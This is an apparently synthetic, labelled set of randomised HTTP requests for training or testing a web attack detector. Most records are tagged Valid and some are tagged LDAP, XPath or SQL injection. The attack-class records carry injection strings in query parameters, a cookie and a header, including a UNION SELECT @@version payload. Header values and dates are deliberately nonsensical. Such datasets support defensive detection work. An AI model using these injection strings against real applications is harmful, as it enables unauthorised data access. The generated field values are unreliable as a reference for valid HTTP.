Client-ip: 157.191.153.50
Cookie: aa9aTR=32;gTSBr6@NbN=window.opene;Wml=eyAT5FjL.eH8;i80retweaAleequ=noaotek9cqr
Cookie2: $Version="8"
Date: Tue, 05 Aug 08 19:48:23 CET
ETag: W/"vtXpvnOSMRy_3ihtR"
Expect: 100-continue
From: owsogmh@sdEtisrsme.org
If-Modified-Since: Sun, 04 Apr 10 12:01:53 UTC
If-Unmodified-Since: Wed, 15 Jul 09 24:33:34 UTC
If-Match: *
If-None-Match: "daX_JRE.ZiEH.74q"
If-Range: Mon, 20 Jun 05 23:21:11 CET
Max-Forwards: 7681
MIME-Version: 4.9
Pragma: neipZvc='dkeC'
Proxy-Authorization: el3ew eon38=myylbi
Authorization: NTLM OG4wdHllaWFlaXRlbm9sdGRvZ3JUbmR5bDdzZWVvZWRuYTVhc2xkeXBnbHd0aHM=
Range: 0-5826,118828-1852,-814
Referer: http://ynCnS6.ch/otsijfsj/lwe0en.mp3
TE: chunked;q=0.5,gzip;q=0.4
Trailer: Accept
User-Agent: Mozilla/3.3 (Machintosh; U; Mac OS X 7.3; ha-bt; rv:1.2.5) Gecko/88617435
UA-CPU: StrongARM
UA-Disp: 6549,336,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 283x1210
Via: n4as/5.0 www.amon.tiff, 1.0 250.92.180.40
Transfer-Encoding: identity
Upgrade: fnhcG/7.7, 5Uaboe/0.6, satvhh/2.7
Warning: 491 www.jeuiAh5t.htm "wjeodstn" "Wed, 27 May 09 09:21:52 GMT"
X-Forwarded-For: 99.254.129.225
X-Serial-Number: 75677711103462595705
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 14748
Start - Id: 20203
class: Valid
GET /tZ78@T1g/ieAPHyUoMxlWr.png? HTTP/1.1
Host: 217.122.157.146
Connection: kRtsbsmn
Accept: image/gif
Accept-Charset: x-mac-arabic, windows-1252, windows-1250;q=0.6, windows-1253;q=0.5
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: max-stale=6
Client-ip: 232.72.29.153
Cookie: md=653263
Cookie2: $Version="390"
Date: Sun, 15 Oct 06 06:00:00 UTC
ETag: "M8E9jA9nfA7H4st9Hp"
Expect: awrrh3m
From: bSdc@weygI.it
If-Modified-Since: Fri, 30 Apr 04 11:26:30 UTC
If-Unmodified-Since: Sat, 16 Dec 06 21:43:05 CET
If-Match: "9jp9PXg7g0uUXYE"
If-None-Match: *
If-Range: Sat, 04 Oct 08 23:59:54 UTC
Max-Forwards: 822
MIME-Version: 1.5
Pragma: 3lnewa='rihE'
Proxy-Authorization: Digest username="lseoiae3"
Authorization: Digest qop=auth-int
Range: 365749-,607-065
Referer: http://www.ntpimt.fr/LKjefv/Oandy/stc5la.gif
TE: gzip;q=0.5,gzip
Trailer: Trailer
User-Agent: isteC81ch
UA-CPU: x86
UA-Disp: 7522,1953,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 4940x047
Via: 4.6 243.64.7.193
Transfer-Encoding: identity
Upgrade: tce/3.4, upn/8.0, iyeTt/3.0
Warning: 233 60.38.176.3 "MeOt13ias" "Mon, 16 Jan 06 05:38:03 UTC"
X-Forwarded-For: 215.190.87.154
X-Serial-Number: 331968303499551
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20203
Start - Id: 6034
class: Valid
PUT /rXdWWdtMkWbsgSu/tsldiu/Fisjjadgtnzlhsjlw/nmbbeox3aTen/YbHtXu8Y9..js? HTTP/1.1
Content-Length: 293
Content-Language: fitii,ns9ra
Content-Encoding: gzip
Content-Location: /atmert2.swf
Content-MD5: aXdnTkF0aW9tYWdhZ2Z3aQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 29 Mar 06 23:49:38 GMT
Last-Modified: Mon, 24 Sep 07 04:48:01 GMT
Host: 208.164.114.143
Connection: rtqerctl
Accept: application/postscript, video/mpeg;q=0.4
Accept-Charset: euc-kr;q=0.7, windows-1257;q=0.4
Accept-Encoding: gzip, identity, compress;q=0.1
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 92.218.111.223
Cookie: l8eE74ine=2Nw
Cookie2: $Version="48"
Date: Sun, 21 Jun 09 07:32:11 CET
ETag: "wiVx9AHv-@VbtIW@"
Expect: 100-continue
From: tlbaw@voaoyodah.biz
If-Modified-Since: Sun, 04 Jan 09 02:38:31 CET
If-Unmodified-Since: Fri, 26 Jun 09 19:37:43 GMT
If-Match: *
If-None-Match: "MgJwm1Q.U4aL60IEno."
If-Range: Sun, 17 Dec 06 10:42:34 UTC
Max-Forwards: 724
MIME-Version: 8.0
Pragma: t51pyh=whogh
Proxy-Authorization: Basic ZmhyZWNtOnJ0bmE=
Authorization: Basic czluQURyQ3k6bmRhbmhh
Range: 199-6
Referer: http://ngcbi.it/veSay/ndtmerio/22h3.aspx
TE: deflate
Trailer: If-Unmodified-Since
User-Agent: Mozilla/8.7 (Machintosh; U; PPC Mac OS X 1.7; on-6v; rv:7.6.5) Gecko/04881513
UA-CPU: Sparc
UA-Disp: 2677,507,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 903x269
Via: FTP/5.9 106.232.94.75:06693
Transfer-Encoding: deflate
Upgrade: ctdT90/6.6, ehttn/1.4, ath/2.3, rdties/0.0, wtnsiW/6.4
Warning: 972 www.rXyaxuai.css "RbSVoIei" "Tue, 23 Jan 07 18:13:35 CET"
X-Forwarded-For: 42.67.23.137
X-Serial-Number: 74978987947334907792
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~

8L_sH=r/r4I%l&K3passwd7Gz-bodyM@4j=bitjuUeinsertbEtsrd&gaae=3aetdeagkd&srtleiett0s=39866&psal=eotayce~eeolaok&eecazF=2hnQr1Ets6dwR&1M3246iframe4=tcTjoabwyepd&nalh0sstre=tIidfhEr&9elzM=wtomeaneetr&UwCFJLZS2=yEtshntotaa5heue&bilebteaut=hIYghnOAzwe&mHdekeotr=rcbtvtPshu&ehr0ea3g=chwh eeorar

End - Id: 6034
Start - Id: 34792
class: Valid
PUT /ssMJD/dyppQepq.html? HTTP/1.0
Content-Length: 58
Content-Language: NlnuDeet
Content-Encoding: deflate
Content-Location: /seeij/ecptyd/ereh/Dses/Cl4qebu.tar.gz
Content-MD5: NWVlY3JxaWl0Y2FtZ3JyZA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 06 Aug 09 05:12:17 UTC
Last-Modified: Sun, 13 Mar 05 02:53:30 CET
Host: www.ieiu83G.it
Connection: fylt
Accept: */*;q=0.4
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: SN-rDehrtrt
Cache-Control: no-store
Client-ip: 100.1.231.182
Cookie: CJidopenl=08246;rTya=mswvwretTuue
Cookie2: $Version="1"
Date: Mon, 26 Oct 09 19:45:02 CET
ETag: W/"QmrzHoOP.OvzI5z9X7"
Expect: 100-continue
From: erhtiA@esgifshqt.ch
If-Modified-Since: Mon, 07 Apr 08 21:13:30 UTC
If-Unmodified-Since: Fri, 26 Sep 08 24:13:03 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8919
MIME-Version: 4.1
Pragma: iattmue='eqwis3k'
Proxy-Authorization: Digest cnonce="7l7uhe"
Authorization: Digest nc=d415FBDD
Range: -32368,1-
Referer: /ehRr6ts/Rao0a/WLil/e5lo.wmn
TE: gzip
Trailer: Pragma
User-Agent: Ssrdatc
UA-CPU: x86
UA-Disp: 261,717,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 262x4505
Via: 5.9 www.labqrws.shtml, FTP/9.0 71.10.161.8, 9.6 www.nc8t.jpeg
Transfer-Encoding: gzip
Upgrade: mtalnn/8.4, 1nleiy/9.0
Warning: 938 www.isiGfs.shtml "hHns1nh" "Wed, 20 May 09 08:56:42 CET"
X-Forwarded-For: 172.233.127.122
X-Serial-Number: 438515700357527
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tmetty1rohem=lhlnoeK&ntm8eminI=kJOyDm8DW&sgdh0hm=nrsEesomu

End - Id: 34792
Start - Id: 38889
class: LdapInjection
GET /_A/rdvpttnee1ejlmeo8/PEcciOw/wtJiux5enelzkiLX5/dY-_L2fwJ8JG/wbirkepoesihcioeeeih/mN9uadminHdropnMWW/G23FtWO_N.L_im.aspx?iTSrfsQNic=%29%28%7C+%28a5%3Deey*%29&AGf_Kw=1 HTTP/1.0
Host: www.slyj.uk
Connection: close
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: no-cache
Client-ip: 191.208.34.138
Cookie: ofsocnimoNt=C9s6i6script F6oxtoe
Cookie2: $Version="1"
Date: Mon, 30 Jul 07 10:57:08 CET
ETag: W/"GQYvF59TeQfbrP-gc"
Expect: isoZd9h5=s7ntbi0r
From: w08rh3@rpehekeyi.com
If-Modified-Since: Thu, 03 Dec 09 13:35:35 GMT
If-Unmodified-Since: Sat, 30 Oct 04 20:09:49 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 19 Apr 08 11:56:07 GMT
Max-Forwards: 41
MIME-Version: 2.4
Pragma: avqey=srneu
Proxy-Authorization: NTLM MnQzaW9iYWF0aHNsUnRjYzBudGlpa0FvVWVjZWE3ZWlwNGVsaHNpYWZpc3BoZWE=
Authorization: rnor emhn=spata
Range: 15934-,799-8058,-81465
Referer: /lciYie/DttrEt.gz
TE: deflate
Trailer: Transfer-Encoding
User-Agent: Mozilla/9.4 (X11; U; SunOS sun4u 9.6; us-re; rv:9.1.5) Gecko/88456474
UA-CPU: x86
UA-Disp: 117,0811,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 297x7324
Via: 5.4 www.afeah.tiff:05, FTP/8.6 www.enHl6cv.gif:90782
Transfer-Encoding: etors; akatC=LOyruhn6
Upgrade: aHt/9.9, puadon/4.1, Ahs/8.1
Warning: 700 www.stne.htm "11aqgslaesnyan" "Thu, 27 Jul 06 11:31:56 CET"
X-Forwarded-For: 179.200.182.228
X-Serial-Number: 9521103915785136495
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 38889
Start - Id: 14068
class: Valid
GET /fFwWbinYoFP1/sUtya6eiNxw.aspx? HTTP/1.0
Host: 168.91.176.226
Connection: keep-alive
Accept: image/jpeg;q=0.2, video/*, audio/*;q=0.9
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: rtnn-rb;q=0.0
Cache-Control: max-stale
Client-ip: 227.127.75.96
Cookie: d3rMsmentept2o=i<Up;ddnobrdvezao3e=gen;ieF9laxeoatto=upasO0ocOnnft0or3l;rhls=amO-zljmD.8;olursglh=4717;gRYofd30nRSa=hc
Cookie2: $Version="8"
Date: Thu, 07 Aug 08 10:49:57 GMT
ETag: "J2eI8Olzjjx5Np4"
Expect: aUatuer
From: eeRxyor@4od4toe.de
If-Modified-Since: Sun, 24 Sep 06 09:39:28 UTC
If-Unmodified-Since: Thu, 14 Feb 08 24:13:54 GMT
If-Match: *
If-None-Match: "eRF2SkvqURY3E6v"
If-Range: Sat, 01 Jul 06 08:12:10 UTC
Max-Forwards: 6040
MIME-Version: 0.9
Pragma: tu3ipln='i99r'
Proxy-Authorization: ttEwuI ekAiIsm=bAtlrrg
Authorization: Basic b25taWVkbDpseW5vdGVp
Range: 477582-,-394214
Referer: http://oqet.it/evoeim/ial4o.asmx
TE: gzip,trailers,chunked;q=0.0
Trailer: TE
User-Agent: oeepf9ld/2.9.7.7.1
UA-CPU: Sparc
UA-Disp: 091,777,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 7101x892
Via: 6.4 220.123.213.115
Transfer-Encoding: identity
Upgrade: f5esqa/4.6, oCCert/1.3, oteo/4.6, Tlf/5.9, inth/5.5
Warning: 557 226.149.145.5 "feRiuodTicoohs" 
X-Forwarded-For: 241.125.208.47
X-Serial-Number: 7508201
----: ----------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 14068
Start - Id: 15518
class: Valid
GET /n6erpu/ooqird./icceedboulzse95set/yM41GzNq1l.js?1rotlte1rvvus1i=ddtasg6oo8cotTkR3 HTTP/1.1
Host: www.7e3PE6bxY.net
Connection: close
Accept: */*;q=0.7
Accept-Charset: iso-8859-2;q=0.0, hz-gb-2312
Accept-Encoding: compress;q=0.0, compress;q=0.7, identity
Accept-Language: rhE-tuhIaose;q=0.7, nratt-v;q=0.2
Cache-Control: max-stale=8
Client-ip: 108.114.210.77
Cookie: 2..Jhn=esam0dstdinfe0+slgaGss0ma;pa65=challl1oD$\Anode
Cookie2: $Version="524"
Date: Thu, 03 Nov 05 24:18:23 CET
ETag: W/"HfjNRiPZAw7WYjax@q"
Expect: iskib
From: seean@8ua2seurko.de
If-Modified-Since: Wed, 16 Aug 06 24:28:26 CET
If-Unmodified-Since: Fri, 05 Aug 05 04:33:35 GMT
If-Match: "FFlLOZCet0fq2hrGq"
If-None-Match: "CG0K0xvUYS13zEGd@8"
If-Range: Tue, 03 Jan 06 03:53:05 GMT
Max-Forwards: 9294
MIME-Version: 2.8
Pragma: lsyco='e3'
Proxy-Authorization: Digest username="mN2ceu"
Authorization: Digest opaque="e4go9n78"
Range: 253580-
Referer: http://9loiaehh.org/1yanT/TlSi/irla.pdf
TE: trailers
Trailer: Transfer-Encoding
User-Agent: Anmqyisr
UA-CPU: x86
UA-Disp: 1586,7819,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 398x075
Via: 1.7 33.210.59.61
Transfer-Encoding: identity
Upgrade: thhe/1.0, eaei/8.0, nsecs/0.9, aadn/9.2, 7na/8.4
Warning: 428 113.186.5.1:5 "dkuzsat" 
X-Forwarded-For: 144.153.36.75
X-Serial-Number: 46412923699025736
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15518
Start - Id: 19058
class: Valid
GET /eda2stehnbeal/6lerotlnv07/wbzE@.IyaW8Um.jpeg?2reMebNh5r=0516932&lTt=50382&6gzsYsetf=4etpqpcs&r0mAeri=n%26+%2BR&nroe=emetonedhee&st5=94&lWiAJ@=%3D+3lTse&abdbne=4&eat=isC&oiUnxjtllsS9ieh=wAJWT&0er=aH%40Hf.ifj5 HTTP/1.1
Host: www.2atdrin.uk:63611
Connection: close
Accept: audio/*, application/postscript
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 241.238.110.42
Cookie: Ad02eeb=Smn)Esltdiw?e;2elWtR=nrniuntuo\vof;Sioniihfaiodt7r=29080;I4c=9346965;rmleeij=tDqWOWRZa
Cookie2: $Version="139"
Date: Wed, 18 Feb 04 13:29:35 GMT
ETag: W/"iFZ3v4f1P9ezQXFcZLr2"
Expect: 100-continue
From: meOreslm@oakuitLO.de
If-Modified-Since: Wed, 17 Sep 08 10:27:54 UTC
If-Unmodified-Since: Mon, 25 May 09 13:42:53 UTC
If-Match: "sLODgcBTe.5mFBCeUQcg"
If-None-Match: *
If-Range: "DsMKfXj4KWjM@2H4e2"
Max-Forwards: 8
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: NTLM Zm5yeW84TmZhZm9hYWl0c3N0OW5pNm4zZDd2ZnBkaGZuZWxtTmV2cnlhY3Ju
Authorization: Basic VGFicm5OOnM3aWlz
Range: 0-122,891-2377,320-202511
Referer: http://www.Rbdesbt.uk/tnrterw/mlTAz/gHzmft/Lat3tA/btmcb.cgi
TE: trailers
Trailer: Upgrade
User-Agent: hw_ZG7RFQJ http://www.tsreenem.it
UA-CPU: MIPS
UA-Disp: 7710,898,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 323x8856
Via: HTTP/0.5 www.wti4hqpa.html
Transfer-Encoding: compress
Upgrade: Nini/5.2, 1Sitkn/4.6
Warning: 437 24.24.24.100 "7MweOrlohfnta5faMmu" "Mon, 02 Apr 07 12:46:21 CET"
X-Forwarded-For: 203.182.207.188
X-Serial-Number: 2525148777282
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 19058
Start - Id: 27565
class: Valid
GET /axooO7q-8CdI2sG/rspiuqa/n9RNQW8xpFhk3/a8/oNTvoBimh/taooathwOtEnelM/rXKAD3UbNzwqX/haolzebayjo6uttr1i/npqF@U2RVbC.Ivs3.php3?dtacscelsneu=dZkI8Z&s24tdc7tCes=34Or84s&WrH1cjF_R=g%40+e4%3AXaRw-e%40bZp&srose2ddgatdb=2toenohh1nw&IrOnga1h=8753468&zJGvarQGGexecstdinoK=3lvbscriptreopeez%3B&Ih8Jainputai7tkZ=nntux0oHds&ugrUwulcNh7=4hifcat79%2Ftrome7r HTTP/1.1
Host: www.hyles7sn.de:80
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: iso-8859-7, gb2312, macintosh;q=0.8, iso-8859-15, utf-8
Accept-Encoding: gzip, deflate;q=0.7, gzip, deflate, identity;q=0.4
Accept-Language: *
Cache-Control: no-cache
Client-ip: 87.97.166.93
Cookie: mTsorrd5s=arfsdke
Cookie2: $Version="6"
Date: Sat, 28 Feb 09 10:02:06 UTC
ETag: "mba2Z2G5bX_IQJM@p"
Expect: shete=A2xRIa9
From: rn1otcn@tde51wqd.st
If-Modified-Since: Mon, 04 Jul 05 07:08:11 CET
If-Unmodified-Since: Mon, 05 Nov 07 05:49:34 CET
If-Match: *
If-None-Match: ".dhagL1w-c8FSUYV"
If-Range: "dcwF364jqM5QStER-G"
Max-Forwards: 6
MIME-Version: 5.8
Pragma: dse5atet=shohrt
Proxy-Authorization: Basic bWF0dGE6b2VzdA==
Authorization: Basic b3NEdGFhaTpFaGdueW8=
Range: 0-33,159-222311,3856-
Referer: /dEly4l/ntfleqfe.js
TE: trailers,trailers
Trailer: If-None-Match
User-Agent: ycyia (vE08Ks)
UA-CPU: 68000
UA-Disp: 883,733,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 4534x344
Via: HTTP/7.6 241.129.162.21
Transfer-Encoding: identity
Upgrade: tqtyi/0.3, 5aftHf/0.4, ifhtn/3.3, ntdsF/5.0
Warning: 197 179.125.106.204:45943 "tentotelsaAsctyrRtpu" 
X-Forwarded-For: 49.154.202.141
X-Serial-Number: 76901665181608584434
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27565
Start - Id: 5515
class: Valid
PUT /tsrai@MTd@2ds58CG/m@WHEMHLsystem/uI/hd/esttoSsa0yTEge.swf? HTTP/1.0
Content-Length: 164
Content-Language: NaksE,ds,ho
Content-Encoding: identity
Content-Location: http://www.oCmEieue.it/eh2tbo.mdb
Content-MD5: aXVhTlI2aXZlYWFuc2poZA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 12 Sep 04 09:46:30 UTC
Last-Modified: Sun, 20 Aug 06 11:28:08 GMT
Host: 22.119.138.130
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: euc-kr, x-mac-greek, macintosh;q=0.7
Accept-Encoding: identity
Accept-Language: sdgxneaJ-eies;q=0.9, Ereoo-var2
Cache-Control: no-cache
Client-ip: 32.67.79.105
Cookie: oEr=sqetc;1oirssash=am3qU;nd3ezrsp6augheH=ynrudoosmyaNet;n-Fftp=5;axnyeqstBlNt7=2ebi
Cookie2: $Version="30"
Date: Sun, 06 Mar 05 22:38:01 GMT
ETag: "g0@iIvnM5Zj5r1.0kD"
Expect: 100-continue
From: RlTg@lDaee.org
If-Modified-Since: Sun, 21 Mar 04 10:36:43 GMT
If-Unmodified-Since: Fri, 16 Oct 09 04:35:41 GMT
If-Match: *
If-None-Match: "A1l.GE1y3g7oBNNNfc"
If-Range: Thu, 06 Sep 07 14:16:28 UTC
Max-Forwards: 6
MIME-Version: 7.0
Pragma: u=glfbe
Proxy-Authorization: Digest opaque="hnr4higt"
Authorization: td2os rysi0=u5itgadb
Range: 4-,7992-3492,625-
Referer: /lsaeabAe/kvccehea/hele/aust8Pt/tsiwI.jpeg
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/5.5 (X11; U; Solaris 2.9; rp-Te; rv:2.3.1) Gecko/38656645
UA-CPU: x86
UA-Disp: 295,212,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 161x6409
Via: HTTP/7.5 www.5ttqe.shtml
Transfer-Encoding: t66ir
Upgrade: aws/0.6
Warning: 321 www.hrctezid.js "o2Tbr6utate" 
X-Forwarded-For: 16.29.207.187
X-Serial-Number: 342559338014903
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

bgsoundin6f=286&hestnmycmd=ivXnSzxih&ir7oelaiaA=h2ntn8dpiei&eTre5W=c0qyvs-&FM1updateYnIo0=55dlnOshevr&easd=1935&erlnwgvagt=cfc&lOh=0Q1G8P9oWj&Ems5tBiSNtl=h.bcDZiiWg

End - Id: 5515
Start - Id: 38243
class: LdapInjection
GET /r3U3X587Rh-P9K5/nncoqei1ntme/ad1w79Y3hBFb/ogXhaw/mrphrsi8csgi/s890Pl4Nze0j/nwejobridh442tlEh/sFO/ck7Env1lObwar/_PKKke_/tC7uqgSDFD.cpw.aspx?sca=krg&ghasYit=lnmestaea0rtnhn&4rcpfebak=gioumn&ss0nraEn1ls=74718367&NTa=0Xy%40&tHonrehEraeb=+t+etyEAq&enrOimgsaernauy=boot.iniopensusr&ajl=wvsotHllfaLdocumentb&eSwjcsmh=14041&znEh0jrf=06053&HlikepulW=lsyt%29%28++++%7C++%284l%3D*%29&cHzob=3188&4w5utoI=attmp%3E%3Fiyiisga+tew&ipvoleua1ta=54996929 HTTP/1.1
Host: www.ow1eTo.gov
Connection: close
Accept: */*
Accept-Charset: windows-1252, x-mac-greek, x-mac-turkish;q=0.6, koi8
Accept-Encoding: 
Accept-Language: 9nbe3o9e-nEhhsnei;q=0.2, obbsyqt0-pdnc;q=0.8, fwi-izcsnn, zviPEeek-t, pt-5rgleo
Cache-Control: no-cache
Client-ip: 25.111.195.232
Cookie: fromat_open3likeB=840910737;eixdAtw=301013;i4lans3j=891;uZqLOw0a=fco
Cookie2: $Version="79"
Date: Thu, 16 Sep 04 15:02:28 CET
ETag: "2UE0tTs01o-b81."
Expect: lereii
From: Oni9Cjt@Idhlgm9aom.net
If-Modified-Since: Thu, 23 Sep 04 21:14:01 UTC
If-Unmodified-Since: Tue, 21 Feb 06 20:08:52 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 1307
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: hgak4o jyhewio=ntfs
Authorization: wtahel auxc9d=5nTomi
Range: 298-,-99
Referer: http://www.ngaade.st/9dta9ts/ptrdot3t/drccdpe/s7nuangt.gz
TE: trailers,deflate
Trailer: Proxy-Authorization
User-Agent: steeKihtqttsshs9DoD
UA-CPU: PowerPC
UA-Disp: 8634,303,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 265x803
Via: 9.8 97.58.62.255, FTP/2.9 34.237.185.182
Transfer-Encoding: deflate
Upgrade: eddcT/3.3, roas/0.6
Warning: 960 www.duToe.shtml "ptStgi2naAcbsign2b" "Wed, 02 Nov 05 20:39:52 UTC"
X-Forwarded-For: 188.85.68.116
X-Serial-Number: 6643372694358822
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 38243
Start - Id: 35859
class: XPathInjection
GET /PcncRzzpasswd/l0Ro8D4kV/fg/nbQCXflDJ68j.htm?ftoyd5s=%40stNr&h9U2wedpe=tbf1-ls&n1=o30.05ny&ieHdrhsS1=lBQZ&anphFteeeete=nesn%27%5D+%7C+++++P+++++%7C++++%2F%2Fuser%5B+name%2Ftext%28+%29+%3D+++%27erOi&sT0eDy=pashseyouoauimiudy&ekfY@t=tiefraeE&iXbTPqF=4iCu&hlh9an=emub%25nhwmtyioevalr&n4hpv7tTnHl=0432688&azfjtshtU=38097891&e2echn8japs=wtbarz&Opod9ks=65160 HTTP/1.1
Host: 95.72.128.74:80
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: iso-8859-1, koi8-r, koi8-r, x-mac-chinesesimp, x-mac-turkish
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.8
Cache-Control: max-age=5
Client-ip: 245.148.145.123
Cookie: dr=71138;J5HpXZuPZCVm=013;mathooei=t/Gl1unph-aW)|yse;ynoaotwla9=l7ncoqs)ns;hE=406919
Cookie2: $Version="9"
Date: Tue, 15 Apr 08 10:13:52 UTC
ETag: "bhOsZQ9I08QZQJM3GB.5"
Expect: tlaf6q=aTyl7Sn
From: alcSeiee@shniectns.be
If-Modified-Since: Mon, 19 Oct 09 08:26:54 GMT
If-Unmodified-Since: Thu, 01 May 08 04:47:49 GMT
If-Match: "75ogcdEg1tIwP2ZdWlK7"
If-None-Match: *
If-Range: "xSRlx4K0Vf@PBz_L"
Max-Forwards: 688
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Basic MGFnc01zaWk6cDlzaW4=
Authorization: NTLM VE9pcmY2b3lwbmN2M3RvUnR0ZjJlbmxuYXV1bG5pdGM0YmVlbm1oYmg3aA==
Range: -15
Referer: http://www.aRott.ch/eooooci/3nmeoitp/naeeo2h/laeiwn3l.jsp
TE: deflate
Trailer: Range
User-Agent: tkRfrtoh0r (cl3bfT; erlKGI5; eB1vQf3Mk; nc5MHwtn9; fBmxkBGbJY)
UA-CPU: Sparc
UA-Disp: 747,476,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 4135x5853
Via: 5.4 146.166.178.19:512, 2.2 142.79.162.64, 7.1 www.etnespdi.jpeg
Transfer-Encoding: gzip
Upgrade: ei2y/3.0
Warning: 278 124.130.70.150 "dewioT68Dmdytekib4" "Tue, 23 Nov 04 10:02:15 GMT"
X-Forwarded-For: 43.11.206.228
X-Serial-Number: 83889853145892267537
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35859
Start - Id: 50064
class: XPathInjection
POST /nBj/iyswtn3oi8nrsgm/8bmwV-wRE8lujwcAMA9_/r7f/lYaQ9/94@F3T7/o2wsbA.vsbcrtau/ura.php? HTTP/1.0
Content-Length: 229
Content-Language: 3Res,os
Content-Encoding: compress
Content-Location: http://hyiohm9e.org/lw57t/m0cobtMp/qghaeoz/dSnbwos/biuOnmib.mdb
Content-MD5: c0FzaWRvZHJsZTIwa2h5ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 24 Apr 07 24:13:23 UTC
Last-Modified: Sun, 27 Jan 08 18:23:43 CET
Host: 193.229.219.179
Connection: tni6ia
Accept: application/postscript, video/quicktime;q=0.8, image/png
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: *
Cache-Control: 8csp='o3'
Client-ip: 78.20.93.165
Cookie: 9NzTUQXB=wbReae;Ps-O=n>deletewp-dr;KII3a2-=72   or 1<    IntTp/aHpnu/tiy/child::text()[position()=98]  or 8='] | /* | /foo[bar='
Cookie2: $Version="188"
Date: Sun, 22 Feb 09 08:53:24 UTC
ETag: "_-1U-eV7HjLd643dy"
Expect: 100-continue
From: zilj@eJseheh.st
If-Modified-Since: Wed, 20 Oct 04 10:39:06 UTC
If-Unmodified-Since: Tue, 21 Aug 07 13:46:38 CET
If-Match: "4e4yTPA28OcvJLv5BU"
If-None-Match: "5pjPmGizVNiaTxYD7GX"
If-Range: "N3937bND1tL.rVM2u"
Max-Forwards: 6514
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Basic ZWVpZmluYTpybnJydDJlbw==
Authorization: Basic ZWNzYWU6UnRwM3Q=
Range: 68-,-66180,-89
Referer: /dsl4neo/o9sIlar/lSkfb/ztfHVn.php4
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/5.6 (Machintosh; U; Mac OS X 7.0; ry-aN; rv:5.0.1) Gecko/91017555
UA-CPU: MIPS
UA-Disp: 086,0919,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 3705x532
Via: 7.5 www.mnttpEht.png
Transfer-Encoding: identity
Upgrade: seeim/7.5, eeEad/9.1, noaakN/7.4, uat/4.4, Shme/3.3
Warning: 646 221.154.0.104 "ixpnotiFtoef9weeio9o" 
X-Forwarded-For: 18.212.91.180
X-Serial-Number: 8468651847937938798
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

er3=aik07Yx.&nAqvIBcUshutdownpasswd=eawnieIhiyysd0;&1tudcomas5hreo=4&ttaevaesfe=izdu9xenrhoyeitar&ypa4apj=8&pshiX3hbaayusap=i4SJwk&seirte5=q&Dma0tx9lhwmv9=Oerhwonb7hoe wf&it6lhh=wsgckre&VXhtpassopenDboot.inil0=86&0O3style=echot

End - Id: 50064
Start - Id: 42712
class: SqlInjection
POST /q0d3Vn5netcatv/SiPwinnt-3EZUFHdM7/ige12Qtt/idCacceptcyL-KQ8/rkVhSwBOCAR9B/abJLj099YfPV/eiieo/peedNrD4dhnbnsr1tvxr/s-@FEzYxdJ.w34h@Uz/av4xWr.css? HTTP/1.1
Content-Length: 55
Content-Language: se
Content-Encoding: identity
Content-Location: http://nntu.com/bbnt/eLzn/thoi/lElcdodc.nsf
Content-MD5: b25Mb2FucnNrYWdlMHNpdQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 12 Sep 06 01:01:17 UTC
Last-Modified: Sat, 20 Nov 04 06:01:27 UTC
Host: www.hrayda.ch
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: '    union    select     @@version,1,1,1--
